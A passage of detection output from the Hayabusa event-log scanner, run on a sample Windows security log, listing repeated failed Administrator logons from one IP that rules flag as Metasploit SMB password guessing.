Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:16.318 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WcXtnkpww8HlSBb3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:16.318 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:16.372 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: y8U7FrQZgDvQ09Uq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:16.372 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:16.430 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UgWwCtz3Gnoq9zYd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:16.430 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:16.478 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mRNPwCogYrwSGeZf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:16.478 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:16.523 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6O9rWY8UGCbuhSwZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:16.523 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:16.552 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HuH4avUJ4AwqXTGa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:16.552 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:16.617 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: japOFEaHgyT3T2fO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:16.617 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:16.657 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IXpRMMNJRgjmd4km : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:16.657 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:16.706 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gtTXA6BiiVyv42cj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:16.706 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:16.749 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wfYkwvNOfKj7rlTj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:16.749 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:16.805 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QzAZyceDjfmUOdz6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:16.805 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:16.849 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: C0Qais0cF8avXJQ6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:16.849 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:16.940 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7KBM2fIEK6pEl7F2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:16.940 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:16.972 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: N3stckaysFk58QAF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:16.972 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:17.017 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oVK4S15DDLWISQ7i : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:17.017 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:17.070 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fAA1bFLD5YMohS9q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:17.070 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:17.105 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: k5V3sfIsj4kYtaGe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:17.105 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:17.152 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IJw4MBG0cvIz2fMR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:17.152 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:17.196 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AXJ0UBfKCzLXJ5y0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:17.196 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:17.232 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Z3A2mmYGcjHBbX3M : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:17.232 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:17.268 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oGlR6pBLnDrzMsqu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:17.268 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:17.316 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Gv7nWzZ1HN9mgTya : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:17.316 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:17.418 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dnPUb3w2d7Ltif2E : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:17.418 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:17.521 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GCWXdvBeDPpeKhWJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:17.521 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:17.576 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GN3OXSzQqLDF348i : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:17.576 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:17.624 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AAWiBhYPNQ0RUuOX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:17.624 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:17.662 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V5CBG3hblqr8kvWw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:17.662 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:17.706 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MDBaKpfYttm4H1gj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:17.706 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:17.743 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PNszt6piEznMlTdF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:17.743 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:17.789 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iqmBPOQIG6M1rZjX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:17.789 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:17.844 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BJs7tuZpsPMYJHOD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:17.844 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:17.880 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LUT5oe2DwS5vW84K : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:17.880 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:17.928 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3OTe0uiDHhf5GzRL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:17.928 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:17.964 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 71TuxFRZFyZEQp1S : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:17.964 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:18.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xRvTmizOLj3UUpD7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:18.008 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:18.044 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LnQEZPWaN2OkpTLa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:18.044 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:18.076 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HnHR9DAtgzu561sx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:18.076 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:18.128 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DfBl3dbluZ7GiFum : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:18.128 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:18.168 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1Hlgn7gsZwRvlXAk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:18.168 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:18.212 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eyHVPtGpnmmRjJuO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:18.212 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:18.252 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: F0l3QC0rLt9yGaIe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:18.252 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:18.289 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XfEng3JgXLmgI8GN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:18.289 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:18.334 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ORIegzlkHy8AX6RW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:18.334 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:18.377 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AzS4xRnHKxSwz5sZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:18.377 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:18.415 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v0hA1XvRIlqwKG6g : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:18.415 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:18.464 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mKXKkvlHvjRh33Vw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:18.464 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:18.582 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JIMTGRC5IQlkrG9c : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:18.582 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB 